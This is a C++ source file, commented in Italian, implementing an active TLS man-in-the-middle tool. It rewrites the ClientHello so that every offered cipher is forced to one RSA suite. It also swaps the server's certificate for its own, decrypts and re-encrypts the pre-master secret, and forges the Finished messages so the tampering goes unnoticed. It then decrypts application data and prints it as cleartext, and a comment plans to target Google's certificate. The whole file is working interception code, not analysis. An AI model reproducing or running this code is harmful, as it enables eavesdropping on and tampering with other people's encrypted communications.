#include "ssl.h"
#include "aes_alg.h"
#include "sha1.h"
#include <arpa/inet.h>

#define BYTE unsigned char
#define DWORD int
#define BOOL bool
#define TRUE 1
#define FALSE 0
#define USHORT unsigned short

extern "C" void sha256( const unsigned char *input, size_t ilen, unsigned char output[32], int is224 );
extern "C" void sha256_hmac( const unsigned char *key, size_t keylen, const unsigned char *input, size_t ilen, unsigned char output[32], int is224 );
extern "C" void sha1_hmac( const unsigned char *key, size_t keylen, const unsigned char *input, size_t ilen, unsigned char output[20] );

#pragma pack(1)
typedef struct {
#define RECORD_TYPE_HANDSHAKE 0x16
#define RECORD_TYPE_CHANGECIPHERSPEC 0x14
#define RECORD_TYPE_APPDATA 0x17
	BYTE content_type;
	BYTE version[2];
	USHORT length;
} ssl_record_t;
#pragma pack()

#pragma pack(1)
typedef struct {
#define FRAGMENT_TYPE_CLIENTHELLO 0x01
#define FRAGMENT_TYPE_SERVERHELLO 0x02
#define FRAGMENT_TYPE_CERTIFICATE 0x0B
#define FRAGMENT_TYPE_CLIENTKEYEXCHANGE 0x10
	BYTE handshake_type;
	BYTE unused;
	USHORT length;
} ssl_fragment_t;
#pragma pack()

#pragma pack(1)
typedef struct {
	BYTE version[2];
	BYTE random[32];
        BYTE sessionidlength;
        // XXX campo sessionid
        USHORT ciphersuitelen;
        USHORT ciphersuite[0];
} hello_packet_t;
#pragma pack()

#pragma pack(1)
typedef struct {
	BYTE unused1;
	USHORT tot_len;
	BYTE unused2;
	USHORT cert_len;
} certificate_packet_t;
#pragma pack()

typedef	struct {
	BYTE version[2];
	BYTE secret[46];
	BYTE padding[256];
} pre_master_t;

#define PACKET_FROM_CLIENT 0
#define PACKET_FROM_SERVER 1

#define FINISHED_RECORD_LEN 64
#define PRE_MASTER_LEN 48
#define AES_IV_LEN 16

class bin_buf {
public :
	bin_buf(void) { buf_ptr = NULL; buf_len = 0; }
	~bin_buf(void) { if (buf_ptr) free(buf_ptr); }

	BOOL add(void *abuf, int alen) {
		BYTE *tmp_buf;
		if (alen<=0 || abuf == NULL)
			return FALSE;
		tmp_buf = (BYTE *)realloc(buf_ptr, buf_len + alen);
		if (!tmp_buf)
			return FALSE;
		buf_ptr = tmp_buf;
		memcpy(buf_ptr+buf_len, abuf, alen);
		buf_len += alen;
		return TRUE;
	}

	BYTE *get_buf(void) { return buf_ptr; }
	DWORD get_len(void) { return buf_len; }
private:
	BYTE *buf_ptr;
	DWORD buf_len;
};

// Globals
bin_buf packet_list[2];
RSA *private_key = NULL;
BYTE *public_cert = NULL;
int public_cert_len = 0;
RSA *server_key = NULL;
pre_master_t pre_master_secret;
BYTE master_secret[48];
BYTE client_random[32];
BYTE server_random[32];
BYTE client_aes_key[16];
BYTE server_aes_key[16];
BYTE client_mac_key[20];
BYTE server_mac_key[20];

void tls_prf_sha256( const unsigned char *secret, size_t slen, const char *label, const unsigned char *random, size_t rlen, unsigned char *dstbuf, size_t dlen )
{
    size_t nb;
    size_t i, j, k;
    unsigned char tmp[128];
    unsigned char h_i[32];

    if( sizeof( tmp ) < 32 + strlen( label ) + rlen )
        return;

    nb = strlen( label );
    memcpy( tmp + 32, label, nb );
    memcpy( tmp + 32 + nb, random, rlen );
    nb += rlen;

    sha256_hmac( secret, slen, tmp + 32, nb, tmp, 0 );

    for( i = 0; i < dlen; i += 32 ) {
        sha256_hmac( secret, slen, tmp, 32 + nb, h_i, 0 );
        sha256_hmac( secret, slen, tmp, 32,      tmp, 0 );

        k = ( i + 32 > dlen ) ? dlen % 32 : 32;

        for( j = 0; j < k; j++ )
            dstbuf[i + j]  = h_i[j];
    }

    memset( tmp, 0, sizeof( tmp ) );
    memset( h_i, 0, sizeof( h_i ) );

    return;
}

// Se non torna NULL il buffer va liberato dal chiamante

BYTE *ReadPublicCert(char *filename, DWORD *out_len)

{
	BYTE *out_cert = NULL, *temp_cert;
	X509 *x509_cert;
	int len;
	FILE *fp;
	
	if (out_len)
		*out_len = 0;

	if ( !(fp = fopen(filename, "rb")) )
		return NULL;

	if ( !(x509_cert = PEM_read_X509(fp, NULL, NULL, NULL)) ) {
		fclose(fp);
		return NULL;
	}

	len = i2d_X509(x509_cert, NULL);
	if (len > 0) {
		temp_cert = out_cert = (BYTE *)malloc(len);
		if (out_cert) {
			len = i2d_X509(x509_cert, &temp_cert);
			if (len <= 0) {
				len = 0;
				free(out_cert);
				out_cert = NULL;
			}
			if (out_len)
				*out_len = len;
		}
	}
 
	X509_free(x509_cert);
	fclose(fp);
	return out_cert;
}

void CaluclateMaster(BYTE *pre_master_secret, BYTE *client_random, BYTE *server_random, BYTE *master_secret)
{
	bin_buf seed;
	seed.add(client_random, 32);
	seed.add(server_random, 32);

	tls_prf_sha256(pre_master_secret, 48, "master secret", seed.get_buf(), seed.get_len(), master_secret, 48);
}

void CaluclateKeyMaterial(BYTE *master_secret, BYTE *client_random, BYTE *server_random, BYTE *client_aes_key, BYTE *server_aes_key, BYTE *client_mac_key, BYTE *server_mac_key)
{
	BYTE temp_buf[104];
	bin_buf seed;
	seed.add(server_random, 32);
	seed.add(client_random, 32);

	tls_prf_sha256(master_secret, 48, "key expansion", seed.get_buf(), seed.get_len(), temp_buf, 72);

	memcpy(client_mac_key, temp_buf, 20);
	memcpy(server_mac_key, temp_buf + 20, 20);
	memcpy(client_aes_key, temp_buf + 40, 16);
	memcpy(server_aes_key, temp_buf + 56, 16);
}

void CalculateFinishedClient(BYTE *master_secret, BYTE *packet_list, DWORD plen, BYTE *finished)
{
	BYTE packet_hash[32];
	sha256(packet_list, plen, packet_hash, 0);
	tls_prf_sha256(master_secret, 48, "client finished", packet_hash, 32, finished, 12);
}

void CalculateFinishedServer(BYTE *master_secret, BYTE *packet_list, DWORD plen, BYTE *finished)
{
	BYTE packet_hash[32];
	sha256(packet_list, plen, packet_hash, 0);
	tls_prf_sha256(master_secret, 48, "server finished", packet_hash, 32, finished, 12);
}

void ParseClientKeyExchange(BYTE *fragment_body, DWORD fragment_len, BYTE direction, BOOL *is_modified)
{
	USHORT len;
	DWORD r_len;
	BYTE re_enc_pre_master[1024];

	// Legge il pre-master secret
	if (fragment_len < sizeof(USHORT) || fragment_len > (256 + sizeof(USHORT)))
		return;
	len = *((USHORT *)fragment_body);
	len = ntohs(len);
	if (fragment_len < len + sizeof(USHORT))
		return;
	if (!private_key || RSA_size(private_key) > 256)
		return;

	r_len = RSA_private_decrypt(len, fragment_body + sizeof(USHORT), (BYTE *)&pre_master_secret, private_key, RSA_PKCS1_PADDING);
	if (r_len != PRE_MASTER_LEN)
		return;

	// Calcola il master-secret e tutto il materiale crittografico
	CaluclateMaster((BYTE *)&pre_master_secret, client_random, server_random, master_secret);
	CaluclateKeyMaterial(master_secret, client_random, server_random, client_aes_key, server_aes_key, client_mac_key, server_mac_key);

	//  Riscrive il pre-master al server (col suo certificato)
	if (!server_key || (RSA_size(server_key) > 256))
		return;

	// Riscrive il premaster cifrato con la chiave del server
	r_len = RSA_public_encrypt(48, (BYTE *)&pre_master_secret, re_enc_pre_master, server_key, RSA_PKCS1_PADDING);
	if (r_len == len) {
		memcpy(fragment_body + sizeof(USHORT), re_enc_pre_master, r_len);
		*is_modified = TRUE;
	}

}

void ParseClientHello(BYTE *fragment_body, DWORD fragment_len, BYTE direction, BOOL *is_modified)
{
	hello_packet_t *hello_packet;

	if (fragment_len < sizeof(hello_packet_t))
		return;

	hello_packet = (hello_packet_t *)fragment_body;
	memcpy(client_random, hello_packet->random, sizeof(client_random));

	// XXX Qui andranno modificati gli algoritmi supportati
        USHORT len = ntohs(hello_packet->ciphersuitelen);

        if(fragment_len < (sizeof(hello_packet_t) + len))
       		return;

        // XXX Tutti i cipher diversi da 0x002f vanno sostituiti con altri random non validi

        for(int i = 0; i < len / sizeof(USHORT); i++) {
           //printf("cipher %04hx\n", ntohs(hello_packet->ciphersuite[i]));
           hello_packet->ciphersuite[i] = htons(0x2f);
        }

	*is_modified = TRUE;
}

void ParseServerHello(BYTE *fragment_body, DWORD fragment_len, BYTE direction, BOOL *is_modified)
{
	hello_packet_t *hello_packet;

	if (fragment_len < sizeof(hello_packet_t))
		return;

	hello_packet = (hello_packet_t *)fragment_body;
	memcpy(server_random, hello_packet->random, sizeof(server_random));
}

void ParseCertificate(BYTE *fragment_body, DWORD fragment_len, BYTE direction, BOOL *is_modified)
{
	X509 *cert;
	EVP_PKEY * pubkey;
	USHORT cert_len;
	certificate_packet_t *certificate_packet;

	if (fragment_len < sizeof(certificate_packet_t))
		return;
	certificate_packet = (certificate_packet_t *)fragment_body;
	cert_len = ntohs(certificate_packet->cert_len);
	if (fragment_len < cert_len + sizeof(certificate_packet_t))
		return;
	certificate_packet += 1;

	// XXX cert va liberato?
	if (! (cert = d2i_X509(NULL, (const BYTE **)&certificate_packet, cert_len)) )
		return;
	if (! (pubkey = X509_get_pubkey (cert)) )
		return;

	server_key = EVP_PKEY_get1_RSA(pubkey);

	// XXX pubkey va liberato; posso farlo subito o questo mi invalida il puntatore server_key?
	// EVP_PKEY_free (pubkey);

	// XXX Qui va rimpiazzato il certificato
        memcpy(fragment_body + sizeof(certificate_packet_t), public_cert, public_cert_len);
	*is_modified = TRUE;
}

BYTE *EncryptFinished(BYTE *finished, BYTE *aes_key, BYTE *mac_key, BYTE *iv)
{
	aes_context ctx;
	static BYTE enc_finished_packet[1024];
	BYTE hmac_digest[20];
	bin_buf finished_packet;
	bin_buf to_hash;

	finished_packet.add((void *)"\x14\x00\x00\x0c", 4);
	finished_packet.add(finished, 12);

	to_hash.add((void *)"\x00\x00\x00\x00\x00\x00\x00\x00\x16\x03\x03\x00\x10", 13); // seq_num (64bit) + TLSCompressed.type + TLSCompressed.version + TLSCompressed.length
	to_hash.add(finished_packet.get_buf(), finished_packet.get_len());

	sha1_hmac(mac_key, 20, to_hash.get_buf(), to_hash.get_len(), hmac_digest);

	finished_packet.add(hmac_digest, 20);
	finished_packet.add((void *)"\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b\x0b", 12); // Per arrivare a un multiplo di 16

	aes_set_key( &ctx, aes_key, 128);
	aes_cbc_encrypt(&ctx, iv, finished_packet.get_buf(), enc_finished_packet, finished_packet.get_len());

	return enc_finished_packet;
}

void ParseFinished(BYTE *fragment_body, DWORD fragment_len, BYTE direction, BOOL *is_modified)
{
	BYTE finished[256];
	BYTE enc_iv[AES_IV_LEN];
	aes_context ctx;
	BYTE *tls_record;

	// Legge il Finished originale 
	memcpy(enc_iv, fragment_body, AES_IV_LEN);
	if (direction == PACKET_FROM_CLIENT)
		aes_set_key( &ctx, client_aes_key, 128);
	else
		aes_set_key( &ctx, server_aes_key, 128);
	aes_cbc_decrypt(&ctx, enc_iv, fragment_body + AES_IV_LEN, finished, 48);
	// Lo inserisce nella lista dei pacchetti della direzione opposta 
	packet_list[direction].add(finished, 16);

	memcpy(enc_iv, fragment_body, AES_IV_LEN);
	
	// Ricalcola il giusto finish e lo inserisce nel pacchetto
	if (direction == PACKET_FROM_CLIENT) {
		CalculateFinishedClient(master_secret, packet_list[!direction].get_buf(), packet_list[!direction].get_len(), finished);
		tls_record = EncryptFinished(finished, client_aes_key, client_mac_key, enc_iv);
	} else {
		CalculateFinishedServer(master_secret, packet_list[!direction].get_buf(), packet_list[!direction].get_len(), finished);
		tls_record = EncryptFinished(finished, server_aes_key, server_mac_key, enc_iv);
	}
	memcpy(fragment_body + AES_IV_LEN, tls_record, fragment_len - AES_IV_LEN);
	*is_modified = TRUE;
}

// XXX va inserita la funzione per decifrare pacchetti applicativi
// XXX Se un record e' "spalmato" in piu' pacchetti, prende solo il primo
void ParseAppdata(BYTE *fragment_body, DWORD fragment_len, BYTE direction)
{
	BYTE app_data[256];
	BYTE enc_iv[AES_IV_LEN];
	aes_context ctx;

	// Legge il Finished originale 
	memcpy(enc_iv, fragment_body, AES_IV_LEN);
	if (direction == PACKET_FROM_CLIENT)
		aes_set_key( &ctx, client_aes_key, 128);
	else
		aes_set_key( &ctx, server_aes_key, 128);
        memset(app_data, 0, 256);
	aes_cbc_decrypt(&ctx, enc_iv, fragment_body + AES_IV_LEN, app_data, 128);
        printf("-----BEGIN CLEARTEXT-----\n%s\n-----END CLEARTEXT-----\n", app_data);
}

// Torna la lunghezza del record parsato
DWORD ParseRecord(BYTE *app_data, DWORD app_data_len, BYTE direction, BOOL *is_modified, BOOL *next_encrypted)
{
	ssl_record_t *ssl_record_header;
	ssl_fragment_t *ssl_fragment_header;
	USHORT record_len;
	USHORT fragment_len;
	BYTE *fragment_body;

	*is_modified = FALSE;

	// Legge l'header del record
	if (app_data_len < sizeof(ssl_record_t))
		return 0;
	ssl_record_header = (ssl_record_t *)app_data;
	record_len = ntohs(ssl_record_header->length);

	// Verifica se il body e' interamente compreso nel pacchetto
	if (app_data_len < (record_len + sizeof(ssl_record_t)))
		return 0;

	// XXX solo per verificare che decifri correttamente
	if (ssl_record_header->content_type == RECORD_TYPE_APPDATA) 
		ParseAppdata(app_data + sizeof(ssl_record_t), record_len, direction);

	// XXX Se e' un CHANGE_CIPHER_SPEC parsa il record successivo come FINISHED:
	// bisogna verificare se ci sono implementazioni di SSL che li mettono in due pacchetti separati
	if (ssl_record_header->content_type == RECORD_TYPE_CHANGECIPHERSPEC) 
		*next_encrypted = TRUE;

	// Ci interessano solo gli handshake
	if (ssl_record_header->content_type == RECORD_TYPE_HANDSHAKE) {

		if (! (*next_encrypted) ) { // Se sono record in chiaro
			// Verifica se la lunghezza del fragment e' consistente con quella del record
			if (record_len < sizeof(ssl_fragment_t))
				return 0;
			
			ssl_fragment_header = (ssl_fragment_t *) (app_data + sizeof(ssl_record_t));
			fragment_len = ntohs(ssl_fragment_header->length);
			if (record_len < (fragment_len + sizeof(ssl_fragment_t))) 
				return 0;
				
			fragment_body = (BYTE *)(ssl_fragment_header + 1);

			// Lo inserisce nella lista dei pacchetti del suo "verso" prima della modifica
			packet_list[direction].add(ssl_fragment_header, record_len);

			switch (ssl_fragment_header->handshake_type) {
				case FRAGMENT_TYPE_CLIENTKEYEXCHANGE:
					ParseClientKeyExchange(fragment_body, fragment_len, direction, is_modified);
				break;
				case FRAGMENT_TYPE_CLIENTHELLO:
					ParseClientHello(fragment_body, fragment_len, direction, is_modified);
				break;
				case FRAGMENT_TYPE_SERVERHELLO:
					ParseServerHello(fragment_body, fragment_len, direction, is_modified);
				break;
				case FRAGMENT_TYPE_CERTIFICATE:
					ParseCertificate(fragment_body, fragment_len, direction, is_modified);
				break;
			}

			// Lo inserisce nella lista dei pacchetti del "verso" oppposto dopo la modifica
			packet_list[!direction].add(ssl_fragment_header, record_len);

		} else {
			// Lo trattiamo come un pacchetto FINISHED 
			// XXX Questo branch prenderebbe anche eventuali rinegoziazioni
			if (record_len != FINISHED_RECORD_LEN)
				return 0;
			ParseFinished(app_data + sizeof(ssl_record_t), record_len, direction, is_modified);
		}
	}

	return record_len + sizeof(ssl_record_t);
}

// - Se il primo pacchetto della sessione non e' un CLIENT_HELLO intero e "riconosciuto", tutta la sessione viene scartata
// - Dovrei conservare uno "stato" della sessione SSL: le TCP retrasmission vanno rimodificate ogni volta, ma inserite una volta sola nella lista dei record di handshake
//   - Sessioni troppo vecchie o con elementi sospetti o non riconosciuti andranno cancellate
// - Fare check versione: TLS1.0 non e' supportato!
// - Implementare handshake di TLS1.1

// XXX Next steps:
// - Cambio del certificato (Google)

BOOL ParsePacket(BYTE *app_data, DWORD app_data_len, BYTE direction)
{
	DWORD len;
	BOOL is_packet_modified = FALSE;
	BOOL is_record_modified = FALSE;
	BOOL next_encrypted = FALSE;

	while (app_data_len != 0) {
		len = ParseRecord(app_data, app_data_len, direction, &is_record_modified, &next_encrypted);
		if (len == 0)
			break;

		if (is_record_modified)
			is_packet_modified = TRUE;

		app_data += len;
		app_data_len -= len;
	}

	return is_packet_modified;
}

RSA *ReadPrivateRSA(char *filename)
{
	FILE *fp = fopen(filename, "rb");
 
	if (fp == NULL)
		return NULL;    

	RSA *rsa= RSA_new();
	rsa = PEM_read_RSAPrivateKey(fp, &rsa, NULL, NULL);
 
	fclose(fp);
	return rsa;
}

DWORD ReadPacketFile(char *filename, BYTE *buffer)
{
	FILE *fp = fopen(filename, "rb");
	DWORD len;
	if (fp == NULL)
		return 0;

	len = fread(buffer, 1, 1024, fp);
	fclose(fp);
	return len;
}

int init(char *cert, char *key)
{
	SSL_library_init();

	// Carica la chiave privata del nostro certificato
	private_key = ReadPrivateRSA(key);
	public_cert = ReadPublicCert(cert, &public_cert_len);

}
#if 0
int main()
{
	DWORD plen;
	BYTE packet[1024];
	BOOL is_modified;

	init((char *)"C:\\Users\\naga\\Desktop\\TODO\\SSL\\ssl-cert-snakeoil.key");

	plen = ReadPacketFile((char *)"C:\\Users\\naga\\Desktop\\TODO\\SSL\\HANDSHAKE_C_1", packet);
	is_modified = ParsePacket(packet, plen, PACKET_FROM_CLIENT);
	plen = ReadPacketFile((char *)"C:\\Users\\naga\\Desktop\\TODO\\SSL\\HANDSHAKE_S_1", packet);
	is_modified = ParsePacket(packet, plen, PACKET_FROM_SERVER);
	plen = ReadPacketFile((char *)"C:\\Users\\naga\\Desktop\\TODO\\SSL\\HANDSHAKE_C_2", packet);
	is_modified = ParsePacket(packet, plen, PACKET_FROM_CLIENT);
	plen = ReadPacketFile((char *)"C:\\Users\\naga\\Desktop\\TODO\\SSL\\HANDSHAKE_S_2", packet);
	is_modified = ParsePacket(packet, plen, PACKET_FROM_SERVER);

} 
#endif
